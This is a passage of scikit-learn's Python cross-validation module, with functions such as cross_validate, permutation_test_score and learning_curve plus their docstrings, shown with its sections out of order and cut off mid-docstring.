folds. Use the list of class names (assumed to be ints) to enforce the correct column order. Note that `classes` is the list of classes in this fold (a subset of the classes in the full training set) and `n_classes` is the number of classes in the full training set. """ if n_classes != len(classes): recommendation = ( 'To fix this, use a cross-validation ' 'technique resulting in properly ' 'stratified folds') warnings.warn('Number of classes in training fold ({}) does ' 'not match total number of classes ({}). ' 'Results may not be appropriate for your use case. ' '{}'.format(len(classes), n_classes, recommendation), RuntimeWarning) if method == 'decision_function': if (predictions.ndim == 2 and predictions.shape[1] != len(classes)): # This handles the case when the shape of predictions # does not match the number of classes used to train # it with. This case is found when sklearn.svm.SVC is # set to `decision_function_shape='ovo'`. raise ValueError('Output shape {} of {} does not match ' 'number of classes ({}) in fold. ' 'Irregular decision_function outputs ' 'are not currently supported by ' 'cross_val_predict'.format( predictions.shape, method, len(classes))) if len(classes) <= 2: # In this special case, `predictions` contains a 1D array. raise ValueError('Only {} class/es in training fold, but {} ' 'in overall dataset. This ' 'is not supported for decision_function ' 'with imbalanced folds. 
{}'.format( len(classes), n_classes, recommendation)) float_min = np.finfo(predictions.dtype).min default_values = {'decision_function': float_min, 'predict_log_proba': float_min, 'predict_proba': 0} predictions_for_all_classes = np.full((_num_samples(predictions), n_classes), default_values[method], dtype=predictions.dtype) predictions_for_all_classes[:, classes] = predictions predictions = predictions_for_all_classes return predictions def _check_is_permutation(indices, n_samples): """Check whether indices is a reordering of the array np.arange(n_samples) Parameters ---------- indices : ndarray int array to test n_samples : int number of expected elements Returns ------- is_partition : bool True iff sorted(indices) is np.arange(n) """ if len(indices) != n_samples: return False hit = np.zeros(n_samples, dtype=bool) hit[indices] = True if not np.all(hit): return False return True @_deprecate_positional_args def permutation_test_score(estimator, X, y, *, groups=None, cv=None, n_permutations=100, n_jobs=None, random_state=0, verbose=0, scoring=None, fit_params=None): """Evaluate the significance of a cross-validated score with permutations Permutes targets to generate 'randomized data' and compute the empirical p-value against the null hypothesis that features and targets are independent. The p-value represents the fraction of randomized data sets where the estimator performed as well or better than in the original data. A small p-value suggests that there is a real dependency between features and targets which has been used by the estimator to give good predictions. A large p-value may be due to lack of real dependency between features and targets or the estimator was not able to use the dependency to give good predictions. Read more in the :ref:`User Guide <permutation_test_score>`. Parameters ---------- estimator : estimator object implementing 'fit' The object to use to fit the data. X : array-like of shape at least 2D The data to fit. y : array-like of shape (n_samples,) or (n_samples, n_outputs) or None The target variable to try to predict in the case of supervised learning. groups : array-like of shape (n_samples,), default=None Labels to constrain permutation within groups, i.e. ``y`` values are permuted among samples with the same group identifier. When not specified, ``y`` values are permuted among all samples. When a grouped cross-validator is used, the group labels are also passed on to the ``split`` method of the cross-validator. The cross-validator uses them for grouping the samples while splitting the dataset into train/test set. scoring : str or callable, default=None A single str (see :ref:`scoring_parameter`) or a callable (see :ref:`scoring`) to evaluate the predictions on the test set. If None the estimator's score method is used. cv : int, cross-validation generator or an iterable, default=None Determines the cross-validation splitting strategy. Possible inputs for cv are: - None, to use the default 5-fold cross validation, - int, to specify the number of folds in a `(Stratified)KFold`, - :term:`CV splitter`, - An iterable yielding (train, test) splits as arrays of indices. For int/None inputs, if the estimator is a classifier and ``y`` is either binary or multiclass, :class:`StratifiedKFold` is used. In all other cases, :class:`KFold` is used. Refer :ref:`User Guide <cross_validation>` for the various cross-validation strategies that can be used here. .. versionchanged:: 0.22 ``cv`` default value if None changed from 3-fold to 5-fold. 
n_permutations : int, default=100 Number of times to permute ``y``. n_jobs : int, default=None Number of jobs to run in parallel. Training the estimator and computing the cross-validated score are parallelized over the permutations. ``None`` means 1 unless in a :obj:`joblib.parallel_backend` context. ``-1`` means using all processors. See :term:`Glossary <n_jobs>` for more details. random_state : int, RandomState instance or None, default=0 Pass an int for reproducible output for permutation of ``y`` values among samples. See :term:`Glossary <random_state>`. verbose : int, default=0 The verbosity level. fit_params : dict, default=None Parameters to pass to the fit method of the estimator. .. versionadded:: 0.24 Returns ------- score : float The true score without permuting targets. permutation_scores : array of shape (n_permutations,) The scores obtained for each permutation. pvalue : float The p-value, which approximates the probability that the score would be obtained by chance. This is calculated as: `(C + 1) / (n_permutations + 1)` Where C is the number of permutations whose score >= the true score. The best possible p-value is 1/(n_permutations + 1), the worst is 1.0. Notes ----- This function implements Test 1 in: Ojala and Garriga. `Permutation Tests for Studying Classifier Performance <http://www.jmlr.org/papers/volume11/ojala10a/ojala10a.pdf>`_. The Journal of Machine Learning Research (2010) vol. 11 """ X, y, groups = indexable(X, y, groups) cv = check_cv(cv, y, classifier=is_classifier(estimator)) scorer = check_scoring(estimator, scoring=scoring) random_state = check_random_state(random_state) # We clone the estimator to make sure that all the folds are # independent, and that it is pickle-able. score = _permutation_test_score(clone(estimator), X, y, groups, cv, scorer, fit_params=fit_params) permutation_scores = Parallel(n_jobs=n_jobs, verbose=verbose)( delayed(_permutation_test_score)( clone(estimator), X, _shuffle(y, groups, random_state), groups, cv, scorer, fit_params=fit_params) for _ in range(n_permutations)) permutation_scores = np.array(permutation_scores) pvalue = (np.sum(permutation_scores >= score) + 1.0) / (n_permutations + 1) return score, permutation_scores, pvalue def _permutation_test_score(estimator, X, y, groups, cv, scorer, fit_params): """Auxiliary function for permutation_test_score""" # Adjust length of sample weights fit_params = fit_params if fit_params is not None else {} avg_score = [] for train, test in cv.split(X, y, groups): X_train, y_train = _safe_split(estimator, X, y, train) X_test, y_test = _safe_split(estimator, X, y, test, train) fit_params = _check_fit_params(X, fit_params, train) estimator.fit(X_train, y_train, **fit_params) avg_score.append(scorer(estimator, X_test, y_test)) return np.mean(avg_score) def _shuffle(y, groups, random_state): """Return a shuffled copy of y, optionally shuffling only within the same groups.""" if groups is None: indices = random_state.permutation(len(y)) else: indices = np.arange(len(groups)) for group in np.unique(groups): this_mask = (groups == group) indices[this_mask] = random_state.permutation(indices[this_mask]) return _safe_indexing(y, indices) @_deprecate_positional_args def learning_curve(estimator, X, y, *, groups=None, train_sizes=np.linspace(0.1, 1.0, 5), cv=None, scoring=None, exploit_incremental_learning=False, n_jobs=None, pre_dispatch="all", verbose=0, shuffle=False, random_state=None, error_score=np.nan, return_times=False, fit_params=None): """Learning curve.
Determines cross-validated training and test scores for different training set sizes. A cross-validation generator splits the whole dataset k times in training and test data. Subsets of the training set with varying sizes will be used to train the estimator and a score for each training subset size and the test set will be computed. Afterwards, the scores will be averaged over all k runs for each training subset size. Read more in the :ref:`User Guide <learning_curve>`. Parameters ---------- estimator : object type that implements the "fit" and "predict" methods An object of that type which is cloned for each validation. X : array-like of shape (n_samples, n_features) Training vector, where n_samples is the number of samples and n_features is the number of features. y : array-like of shape (n_samples,) or (n_samples, n_outputs) Target relative to X for classification or regression; None for unsupervised learning. groups : array-like of shape (n_samples,), default=None Group labels for the samples used while splitting the dataset into train/test set. Only used in conjunction with a "Group" :term:`cv` instance (e.g., :class:`GroupKFold`). train_sizes : array-like of shape (n_ticks,), \ default=np.linspace(0.1, 1.0, 5) Relative or absolute numbers of training examples that will be used to generate the learning curve. If the dtype is float, it is regarded as a fraction of the maximum size of the training set (that is determined by the selected validation method), i.e. it has to be within (0, 1]. Otherwise it is interpreted as absolute sizes of the training sets. Note that for classification the number of samples usually has to be large enough to contain at least one sample from each class. cv : int, cross-validation generator or an iterable, default=None Determines the cross-validation splitting strategy. Possible inputs for cv are: - None, to use the default 5-fold cross validation, - int, to specify the number of folds in a `(Stratified)KFold`, - :term:`CV splitter`, - An iterable yielding (train, test) splits as arrays of indices. For int/None inputs, if the estimator is a classifier and ``y`` is either binary or multiclass, :class:`StratifiedKFold` is used. In all other cases, :class:`KFold` is used. Refer :ref:`User Guide <cross_validation>` for the various cross-validation strategies that can be used here. .. versionchanged:: 0.22 ``cv`` default value if None changed from 3-fold to 5-fold. scoring : str or callable, default=None A str (see model evaluation documentation) or a scorer callable object / function with signature ``scorer(estimator, X, y)``. exploit_incremental_learning : bool, default=False If the estimator supports incremental learning, this will be used to speed up fitting for different training set sizes. n_jobs : int, default=None Number of jobs to run in parallel. Training the estimator and computing the score are parallelized over the different training and test sets. ``None`` means 1 unless in a :obj:`joblib.parallel_backend` context. ``-1`` means using all processors. See :term:`Glossary <n_jobs>` for more details. pre_dispatch : int or str, default='all' Number of predispatched jobs for parallel execution (default is all). The option can reduce the allocated memory. The str can be an expression like '2*n_jobs'. verbose : int, default=0 Controls the verbosity: the higher, the more messages. shuffle : bool, default=False Whether to shuffle training data before taking prefixes of it based on ``train_sizes``.
random_state : int, RandomState instance or None, default=None Used when ``shuffle`` is True. Pass an int for reproducible output across multiple function calls. See :term:`Glossary <random_state>`. error_score : 'raise' or numeric, default=np.nan Value to assign to the score if an error occurs in estimator fitting. If set to 'raise', the error is raised. If a numeric value is given, FitFailedWarning is raised. .. versionadded:: 0.20 return_times : bool, default=False Whether to return the fit and score times. fit_params : dict, default=None Parameters to pass to the fit method of the estimator. .. versionadded:: 0.24 Returns ------- train_sizes_abs : array of shape (n_unique_ticks,) Numbers of training examples that have been used to generate the learning curve. Note that the number of ticks might be less than n_ticks because duplicate entries will be removed. train_scores : array of shape (n_ticks, n_cv_folds) Scores on training sets. test_scores : array of shape (n_ticks, n_cv_folds) Scores on test set. fit_times : array of shape (n_ticks, n_cv_folds) Times spent for fitting in seconds. Only present if ``return_times`` is True. score_times : array of shape (n_ticks, n_cv_folds) Times spent for scoring in seconds. Only present if ``return_times`` is True. Notes ----- See :ref:`examples/model_selection/plot_learning_curve.py <sphx_glr_auto_examples_model_selection_plot_learning_curve.py>` """ if exploit_incremental_learning and not hasattr(estimator, "partial_fit"): raise ValueError("An estimator must support the partial_fit interface " "to exploit incremental learning") X, y, groups = indexable(X, y, groups) cv = check_cv(cv, y, classifier=is_classifier(estimator)) # Store it as list as we will be iterating over the list multiple times cv_iter = list(cv.split(X, y, groups)) scorer = check_scoring(estimator, scoring=scoring) n_max_training_samples = len(cv_iter[0][0]) # Because the lengths of folds can be significantly different, it is # not guaranteed that we use all of the available training data when we # use the first 'n_max_training_samples' samples.
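# Illustrative sketch (an assumption for exposition, not part of the
# original flow): with 5-fold CV on 100 samples, each training fold has
# about 80 samples, so the default train_sizes=np.linspace(0.1, 1.0, 5)
# is translated below to roughly [8, 26, 44, 62, 80] absolute sizes;
# integer inputs such as train_sizes=[10, 40, 80] pass through unchanged
# after validation.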
train_sizes_abs = _translate_train_sizes(train_sizes, n_max_training_samples) n_unique_ticks = train_sizes_abs.shape[0] if verbose > 0: print("[learning_curve] Training set sizes: " + str(train_sizes_abs)) parallel = Parallel(n_jobs=n_jobs, pre_dispatch=pre_dispatch, verbose=verbose) if shuffle: rng = check_random_state(random_state) cv_iter = ((rng.permutation(train), test) for train, test in cv_iter) if exploit_incremental_learning: classes = np.unique(y) if is_classifier(estimator) else None out = parallel(delayed(_incremental_fit_estimator)( clone(estimator), X, y, classes, train, test, train_sizes_abs, scorer, verbose, return_times, error_score=error_score, fit_params=fit_params) for train, test in cv_iter ) out = np.asarray(out).transpose((2, 1, 0)) else: train_test_proportions = [] for train, test in cv_iter: for n_train_samples in train_sizes_abs: train_test_proportions.append((train[:n_train_samples], test)) results = parallel(delayed(_fit_and_score)( clone(estimator), X, y, scorer, train, test, verbose, parameters=None, fit_params=fit_params, return_train_score=True, error_score=error_score, return_times=return_times) for train, test in train_test_proportions ) results = _aggregate_score_dicts(results) train_scores = results["train_scores"].reshape(-1, n_unique_ticks).T test_scores = results["test_scores"].reshape(-1, n_unique_ticks).T out = [train_scores, test_scores] if return_times: fit_times = results["fit_time"].reshape(-1, n_unique_ticks).T score_times = results["score_time"].reshape(-1, n_unique_ticks).T out.extend([fit_times, score_times]) ret = train_sizes_abs, out[0], out[1] if return_times: ret = ret + (out[2], out[3]) return ret def _translate_train_sizes(train_sizes, n_max_training_samples): """Determine absolute sizes of training subsets and validate 'train_sizes'. Examples: _translate_train_sizes([0.5, 1.0], 10) -> [5, 10] _translate_train_sizes([5, 10], 10) -> [5, 10] Parameters ---------- train_sizes : array-like of shape (n_ticks,) Numbers of training examples that will be used to generate the learning curve. If the dtype is float, it is regarded as a fraction of 'n_max_training_samples', i.e. it has to be within (0, 1]. n_max_training_samples : int Maximum number of training samples (upper bound of 'train_sizes'). Returns ------- train_sizes_abs : array of shape (n_unique_ticks,) Numbers of training examples that will be used to generate the learning curve. Note that the number of ticks might be less than n_ticks because duplicate entries will be removed. """ train_sizes_abs = np.asarray(train_sizes) n_ticks = train_sizes_abs.shape[0] n_min_required_samples = np.min(train_sizes_abs) n_max_required_samples = np.max(train_sizes_abs) if np.issubdtype(train_sizes_abs.dtype, np.floating): if n_min_required_samples <= 0.0 or n_max_required_samples > 1.0: raise ValueError("train_sizes has been interpreted as fractions " "of the maximum number of training samples and " "must be within (0, 1], but is within [%f, %f]." % (n_min_required_samples, n_max_required_samples)) train_sizes_abs = (train_sizes_abs * n_max_training_samples).astype( dtype=int, copy=False) train_sizes_abs = np.clip(train_sizes_abs, 1, n_max_training_samples) else: if (n_min_required_samples <= 0 or n_max_required_samples > n_max_training_samples): raise ValueError("train_sizes has been interpreted as absolute " "numbers of training samples and must be within " "(0, %d], but is within [%d, %d]." 
% (n_max_training_samples, n_min_required_samples, n_max_required_samples)) train_sizes_abs = np.unique(train_sizes_abs) if n_ticks > train_sizes_abs.shape[0]: warnings.warn("Removed duplicate entries from 'train_sizes'. Number " "of ticks will be less than the size of " "'train_sizes' (%d instead of %d)." % (train_sizes_abs.shape[0], n_ticks), RuntimeWarning) return train_sizes_abs def _incremental_fit_estimator(estimator, X, y, classes, train, test, train_sizes, scorer, verbose, return_times, error_score, fit_params): """Train estimator on training subsets incrementally and compute scores.""" train_scores, test_scores, fit_times, score_times = [], [], [], [] partitions = zip(train_sizes, np.split(train, train_sizes)[:-1]) if fit_params is None: fit_params = {} for n_train_samples, partial_train in partitions: train_subset = train[:n_train_samples] X_train, y_train = _safe_split(estimator, X, y, train_subset) X_partial_train, y_partial_train = _safe_split(estimator, X, y, partial_train) X_test, y_test = _safe_split(estimator, X, y, test, train_subset) start_fit = time.time() if y_partial_train is None: estimator.partial_fit(X_partial_train, classes=classes, **fit_params) else: estimator.partial_fit(X_partial_train, y_partial_train, classes=classes, **fit_params) fit_time = time.time() - start_fit fit_times.append(fit_time) start_score = time.time() test_scores.append( _score(estimator, X_test, y_test, scorer, error_score) ) train_scores.append( _score(estimator, X_train, y_train, scorer, error_score) ) score_time = time.time() - start_score score_times.append(score_time) ret = ((train_scores, test_scores, fit_times, score_times) if return_times else (train_scores, test_scores)) return np.array(ret).T @_deprecate_positional_args def validation_curve(estimator, X, y, *, param_name, param_range, groups=None, cv=None, scoring=None, n_jobs=None, pre_dispatch="all", verbose=0, error_score=np.nan, fit_params=None): """Validation curve. Determine training and test scores for varying parameter values. Compute scores for an estimator with different values of a specified parameter. This is similar to grid search with one parameter. However, this will also compute training scores and is merely a utility for plotting the results. Read more in the :ref:`User Guide <validation_curve>`. Parameters ---------- estimator : object type that implements the "fit" and "predict" methods An object of that type which is cloned for each validation. X : array-like of shape (n_samples, n_features) Training vector, where n_samples is the number of samples and n_features is the number of features. y : array-like of shape (n_samples,) or (n_samples, n_outputs) or None Target relative to X for classification or regression; None for unsupervised learning. param_name : str Name of the parameter that will be varied. param_range : array-like of shape (n_values,) The values of the parameter that will be evaluated. groups : array-like of shape (n_samples,), default=None Group labels for the samples used while splitting the dataset into train/test set. Only used in conjunction with a "Group" :term:`cv` instance (e.g., :class:`GroupKFold`). cv : int, cross-validation generator or an iterable, default=None Determines the cross-validation splitting strategy. Possible inputs for cv are: - None, to use the default 5-fold cross validation, - int, to specify the number of folds in a `(Stratified)KFold`, - :term:`CV splitter`, - An iterable yielding (train, test) splits as arrays of indices.
For int/None inputs, if the estimator is a classifier and ``y`` is either binary or multiclass, :class:`StratifiedKFold` is used. In all other cases, :class:`KFold` is used. Refer :ref:`User Guide <cross_validation>` for the various cross-validation strategies that can be used here. .. versionchanged:: 0.22 ``cv`` default value if None changed from 3-fold to 5-fold. scoring : str or callable, default=None A str (see model evaluation documentation) or a scorer callable object / function with signature ``scorer(estimator, X, y)``. n_jobs : int, default=None Number of jobs to run in parallel. Training the estimator and computing the score are parallelized over the combinations of each parameter value and each cross-validation split. ``None`` means 1 unless in a :obj:`joblib.parallel_backend` context. ``-1`` means using all processors. See :term:`Glossary <n_jobs>` for more details. pre_dispatch : int or str, default='all' Number of predispatched jobs for parallel execution (default is all). The option can reduce the allocated memory. The str can be an expression like '2*n_jobs'. verbose : int, default=0 Controls the verbosity: the higher, the more messages. fit_params : dict, default=None Parameters to pass to the fit method of the estimator. .. versionadded:: 0.24 error_score : 'raise' or numeric, default=np.nan Value to assign to the score if an error occurs in estimator fitting. If set to 'raise', the error is raised. If a numeric value is given, FitFailedWarning is raised. .. versionadded:: 0.20 Returns ------- train_scores : array of shape (n_ticks, n_cv_folds) Scores on training sets. test_scores : array of shape (n_ticks, n_cv_folds) Scores on test set. Notes ----- See :ref:`sphx_glr_auto_examples_model_selection_plot_validation_curve.py` """ X, y, groups = indexable(X, y, groups) cv = check_cv(cv, y, classifier=is_classifier(estimator)) scorer = check_scoring(estimator, scoring=scoring) parallel = Parallel(n_jobs=n_jobs, pre_dispatch=pre_dispatch, verbose=verbose) results = parallel(delayed(_fit_and_score)( clone(estimator), X, y, scorer, train, test, verbose, parameters={param_name: v}, fit_params=fit_params, return_train_score=True, error_score=error_score) # NOTE: do not change the order of iteration, to allow one-time cv splitters for train, test in cv.split(X, y, groups) for v in param_range) n_params = len(param_range) results = _aggregate_score_dicts(results) train_scores = results["train_scores"].reshape(-1, n_params).T test_scores = results["test_scores"].reshape(-1, n_params).T return train_scores, test_scores def _aggregate_score_dicts(scores): """Aggregate a list of dicts to a dict of np ndarrays The input is a flat list of dicts of the form [{'prec': 0.1, 'acc':1.0}, {'prec': 0.1, 'acc':1.0}, ...]; convert it to a dict of arrays {'prec': np.array([0.1 ...]), ...} Parameters ---------- scores : list of dict List of dicts of the scores for all scorers. This is a flat list, assumed originally to be of row major order. Examples -------- >>> scores = [{'a': 1, 'b':10}, {'a': 2, 'b':2}, {'a': 3, 'b':3}, ... {'a': 10, 'b': 10}] # doctest: +SKIP >>> _aggregate_score_dicts(scores) # doctest: +SKIP {'a': array([1, 2, 3, 10]), 'b': array([10, 2, 3, 10])} """ return { key: np.asarray([score[key] for score in scores]) if isinstance(scores[0][key], (numbers.Number, np.ndarray)) else [score[key] for score in scores] for key in scores[0] }
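# A minimal usage sketch for ``validation_curve`` (illustrative only: the
# dataset, estimator and parameter grid below are arbitrary assumptions,
# not fixtures of this module):
#
#     from sklearn.datasets import load_iris
#     from sklearn.svm import SVC
#     from sklearn.model_selection import validation_curve
#
#     X, y = load_iris(return_X_y=True)
#     train_scores, test_scores = validation_curve(
#         SVC(), X, y, param_name="gamma",
#         param_range=[1e-3, 1e-2, 1e-1, 1.0], cv=5)
#     # Both returned arrays have shape (n_param_values, n_cv_folds),
#     # here (4, 5); averaging over axis=1 gives one curve per array.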
""" The :mod:`sklearn.model_selection._validation` module includes classes and functions to validate the model. """ # Author: Alexandre Gramfort <alexandre.gramfort@inria.fr> # Gael Varoquaux <gael.varoquaux@normalesup.org> # Olivier Grisel <olivier.grisel@ensta.org> # Raghav RV <rvraghav93@gmail.com> # License: BSD 3 clause import warnings import numbers import time from traceback import format_exc from contextlib import suppress import numpy as np import scipy.sparse as sp from joblib import Parallel, logger from ..base import is_classifier, clone from ..utils import indexable, check_random_state, _safe_indexing from ..utils.validation import _check_fit_params from ..utils.validation import _num_samples from ..utils.validation import _deprecate_positional_args from ..utils.fixes import delayed from ..utils.metaestimators import _safe_split from ..metrics import check_scoring from ..metrics._scorer import _check_multimetric_scoring, _MultimetricScorer from ..exceptions import FitFailedWarning, NotFittedError from ._split import check_cv from ..preprocessing import LabelEncoder __all__ = ['cross_validate', 'cross_val_score', 'cross_val_predict', 'permutation_test_score', 'learning_curve', 'validation_curve'] @_deprecate_positional_args def cross_validate(estimator, X, y=None, *, groups=None, scoring=None, cv=None, n_jobs=None, verbose=0, fit_params=None, pre_dispatch='2*n_jobs', return_train_score=False, return_estimator=False, error_score=np.nan): """Evaluate metric(s) by cross-validation and also record fit/score times. Read more in the :ref:`User Guide <multimetric_cross_validation>`. Parameters ---------- estimator : estimator object implementing 'fit' The object to use to fit the data. X : array-like of shape (n_samples, n_features) The data to fit. Can be for example a list, or an array. y : array-like of shape (n_samples,) or (n_samples, n_outputs), \ default=None The target variable to try to predict in the case of supervised learning. groups : array-like of shape (n_samples,), default=None Group labels for the samples used while splitting the dataset into train/test set. Only used in conjunction with a "Group" :term:`cv` instance (e.g., :class:`GroupKFold`). scoring : str, callable, list, tuple, or dict, default=None Strategy to evaluate the performance of the cross-validated model on the test set. If `scoring` represents a single score, one can use: - a single string (see :ref:`scoring_parameter`); - a callable (see :ref:`scoring`) that returns a single value. If `scoring` reprents multiple scores, one can use: - a list or tuple of unique strings; - a callable returning a dictionary where the keys are the metric names and the values are the metric scores; - a dictionary with metric names as keys and callables a values. See :ref:`multimetric_grid_search` for an example. cv : int, cross-validation generator or an iterable, default=None Determines the cross-validation splitting strategy. Possible inputs for cv are: - None, to use the default 5-fold cross validation, - int, to specify the number of folds in a `(Stratified)KFold`, - :term:`CV splitter`, - An iterable yielding (train, test) splits as arrays of indices. For int/None inputs, if the estimator is a classifier and ``y`` is either binary or multiclass, :class:`StratifiedKFold` is used. In all other cases, :class:`KFold` is used. Refer :ref:`User Guide <cross_validation>` for the various cross-validation strategies that can be used here. .. versionchanged:: 0.22 ``cv`` default value if None changed from 3-fold to 5-fold. 
n_jobs : int, default=None Number of jobs to run in parallel. Training the estimator and computing the score are parallelized over the cross-validation splits. ``None`` means 1 unless in a :obj:`joblib.parallel_backend` context. ``-1`` means using all processors. See :term:`Glossary <n_jobs>` for more details. verbose : int, default=0 The verbosity level. fit_params : dict, default=None Parameters to pass to the fit method of the estimator. pre_dispatch : int or str, default='2*n_jobs' Controls the number of jobs that get dispatched during parallel execution. Reducing this number can be useful to avoid an explosion of memory consumption when more jobs get dispatched than CPUs can process. This parameter can be: - None, in which case all the jobs are immediately created and spawned. Use this for lightweight and fast-running jobs, to avoid delays due to on-demand spawning of the jobs - An int, giving the exact number of total jobs that are spawned - A str, giving an expression as a function of n_jobs, as in '2*n_jobs' return_train_score : bool, default=False Whether to include train scores. Computing training scores is used to get insights on how different parameter settings impact the overfitting/underfitting trade-off. However computing the scores on the training set can be computationally expensive and is not strictly required to select the parameters that yield the best generalization performance. .. versionadded:: 0.19 .. versionchanged:: 0.21 Default value was changed from ``True`` to ``False`` return_estimator : bool, default=False Whether to return the estimators fitted on each split. .. versionadded:: 0.20 error_score : 'raise' or numeric, default=np.nan Value to assign to the score if an error occurs in estimator fitting. If set to 'raise', the error is raised. If a numeric value is given, FitFailedWarning is raised. .. versionadded:: 0.20 Returns ------- scores : dict of float arrays of shape (n_splits,) Array of scores of the estimator for each run of the cross validation. A dict of arrays containing the score/time arrays for each scorer is returned. The possible keys for this ``dict`` are: ``test_score`` The score array for test scores on each cv split. Suffix ``_score`` in ``test_score`` changes to a specific metric like ``test_r2`` or ``test_auc`` if there are multiple scoring metrics in the scoring parameter. ``train_score`` The score array for train scores on each cv split. Suffix ``_score`` in ``train_score`` changes to a specific metric like ``train_r2`` or ``train_auc`` if there are multiple scoring metrics in the scoring parameter. This is available only if ``return_train_score`` parameter is ``True``. ``fit_time`` The time for fitting the estimator on the train set for each cv split. ``score_time`` The time for scoring the estimator on the test set for each cv split. (Note that the time for scoring on the train set is not included even if ``return_train_score`` is set to ``True``.) ``estimator`` The estimator objects for each cv split. This is available only if ``return_estimator`` parameter is set to ``True``.
Examples -------- >>> from sklearn import datasets, linear_model >>> from sklearn.model_selection import cross_validate >>> diabetes = datasets.load_diabetes() >>> X = diabetes.data[:150] >>> y = diabetes.target[:150] >>> lasso = linear_model.Lasso() Single metric evaluation using ``cross_validate`` >>> cv_results = cross_validate(lasso, X, y, cv=3) >>> sorted(cv_results.keys()) ['fit_time', 'score_time', 'test_score'] >>> cv_results['test_score'] array([0.33150734, 0.08022311, 0.03531764]) Multiple metric evaluation using ``cross_validate`` (please refer to the ``scoring`` parameter doc for more information) >>> scores = cross_validate(lasso, X, y, cv=3, ... scoring=('r2', 'neg_mean_squared_error'), ... return_train_score=True) >>> print(scores['test_neg_mean_squared_error']) [-3635.5... -3573.3... -6114.7...] >>> print(scores['train_r2']) [0.28010158 0.39088426 0.22784852] See Also --------- cross_val_score : Run cross-validation for single metric evaluation. cross_val_predict : Get predictions from each split of cross-validation for diagnostic purposes. sklearn.metrics.make_scorer : Make a scorer from a performance metric or loss function. """ X, y, groups = indexable(X, y, groups) cv = check_cv(cv, y, classifier=is_classifier(estimator)) if callable(scoring): scorers = scoring elif scoring is None or isinstance(scoring, str): scorers = check_scoring(estimator, scoring) else: scorers = _check_multimetric_scoring(estimator, scoring) # We clone the estimator to make sure that all the folds are # independent, and that it is pickle-able. parallel = Parallel(n_jobs=n_jobs, verbose=verbose, pre_dispatch=pre_dispatch) results = parallel( delayed(_fit_and_score)( clone(estimator), X, y, scorers, train, test, verbose, None, fit_params, return_train_score=return_train_score, return_times=True, return_estimator=return_estimator, error_score=error_score) for train, test in cv.split(X, y, groups)) # For callable scoring, the return type is only known after calling. If the # return type is a dictionary, the error scores can now be inserted with # the correct key. if callable(scoring): _insert_error_scores(results, error_score) results = _aggregate_score_dicts(results) ret = {} ret['fit_time'] = results["fit_time"] ret['score_time'] = results["score_time"] if return_estimator: ret['estimator'] = results["estimator"] test_scores_dict = _normalize_score_results(results["test_scores"]) if return_train_score: train_scores_dict = _normalize_score_results(results["train_scores"]) for name in test_scores_dict: ret['test_%s' % name] = test_scores_dict[name] if return_train_score: key = 'train_%s' % name ret[key] = train_scores_dict[name] return ret def _insert_error_scores(results, error_score): """Insert `error_score` into `results`, replacing failed entries inplace. This only applies to multimetric scores because `_fit_and_score` will handle the single metric case.
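For example (a sketch with assumed inputs): with ``scoring={'acc': ..., 'f1': ...}`` and ``error_score=0``, each failed split's ``test_scores`` entry is replaced by ``{'acc': 0, 'f1': 0}``; array-valued scores are filled elementwise to match the shape seen on a successful split.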
""" successful_score = None failed_indices = [] for i, result in enumerate(results): if result["fit_failed"]: failed_indices.append(i) elif successful_score is None: successful_score = result["test_scores"] if successful_score is None: raise NotFittedError("All estimators failed to fit") if isinstance(successful_score, dict): formatted_error = {} for name, score in successful_score.items(): if isinstance(score, np.ndarray) and error_score != 'raise': formatted_error[name] = np.full_like(score, error_score) else: formatted_error[name] = error_score for i in failed_indices: results[i]["test_scores"] = formatted_error.copy() if "train_scores" in results[i]: results[i]["train_scores"] = formatted_error.copy() def _normalize_score_results(scores, scaler_score_key='score'): """Creates a scoring dictionary based on the type of `scores`""" if isinstance(scores[0], dict): # multimetric scoring return _aggregate_score_dicts(scores) # scaler return {scaler_score_key: scores} @_deprecate_positional_args def cross_val_score(estimator, X, y=None, *, groups=None, scoring=None, cv=None, n_jobs=None, verbose=0, fit_params=None, pre_dispatch='2*n_jobs', error_score=np.nan): """Evaluate a score by cross-validation Read more in the :ref:`User Guide <cross_validation>`. Parameters ---------- estimator : estimator object implementing 'fit' The object to use to fit the data. X : array-like of shape (n_samples, n_features) The data to fit. Can be for example a list, or an array. y : array-like of shape (n_samples,) or (n_samples, n_outputs), \ default=None The target variable to try to predict in the case of supervised learning. groups : array-like of shape (n_samples,), default=None Group labels for the samples used while splitting the dataset into train/test set. Only used in conjunction with a "Group" :term:`cv` instance (e.g., :class:`GroupKFold`). scoring : str or callable, default=None A str (see model evaluation documentation) or a scorer callable object / function with signature ``scorer(estimator, X, y)`` which should return only a single value. Similar to :func:`cross_validate` but only a single metric is permitted. If None, the estimator's default scorer (if available) is used. cv : int, cross-validation generator or an iterable, default=None Determines the cross-validation splitting strategy. Possible inputs for cv are: - None, to use the default 5-fold cross validation, - int, to specify the number of folds in a `(Stratified)KFold`, - :term:`CV splitter`, - An iterable yielding (train, test) splits as arrays of indices. For int/None inputs, if the estimator is a classifier and ``y`` is either binary or multiclass, :class:`StratifiedKFold` is used. In all other cases, :class:`KFold` is used. Refer :ref:`User Guide <cross_validation>` for the various cross-validation strategies that can be used here. .. versionchanged:: 0.22 ``cv`` default value if None changed from 3-fold to 5-fold. n_jobs : int, default=None Number of jobs to run in parallel. Training the estimator and computing the score are parallelized over the cross-validation splits. ``None`` means 1 unless in a :obj:`joblib.parallel_backend` context. ``-1`` means using all processors. See :term:`Glossary <n_jobs>` for more details. verbose : int, default=0 The verbosity level. fit_params : dict, default=None Parameters to pass to the fit method of the estimator. pre_dispatch : int or str, default='2*n_jobs' Controls the number of jobs that get dispatched during parallel execution. 
Reducing this number can be useful to avoid an explosion of memory consumption when more jobs get dispatched than CPUs can process. This parameter can be: - None, in which case all the jobs are immediately created and spawned. Use this for lightweight and fast-running jobs, to avoid delays due to on-demand spawning of the jobs - An int, giving the exact number of total jobs that are spawned - A str, giving an expression as a function of n_jobs, as in '2*n_jobs' error_score : 'raise' or numeric, default=np.nan Value to assign to the score if an error occurs in estimator fitting. If set to 'raise', the error is raised. If a numeric value is given, FitFailedWarning is raised. .. versionadded:: 0.20 Returns ------- scores : ndarray of float of shape=(len(list(cv)),) Array of scores of the estimator for each run of the cross validation. Examples -------- >>> from sklearn import datasets, linear_model >>> from sklearn.model_selection import cross_val_score >>> diabetes = datasets.load_diabetes() >>> X = diabetes.data[:150] >>> y = diabetes.target[:150] >>> lasso = linear_model.Lasso() >>> print(cross_val_score(lasso, X, y, cv=3)) [0.33150734 0.08022311 0.03531764] See Also --------- cross_validate : To run cross-validation on multiple metrics and also to return train scores, fit times and score times. cross_val_predict : Get predictions from each split of cross-validation for diagnostic 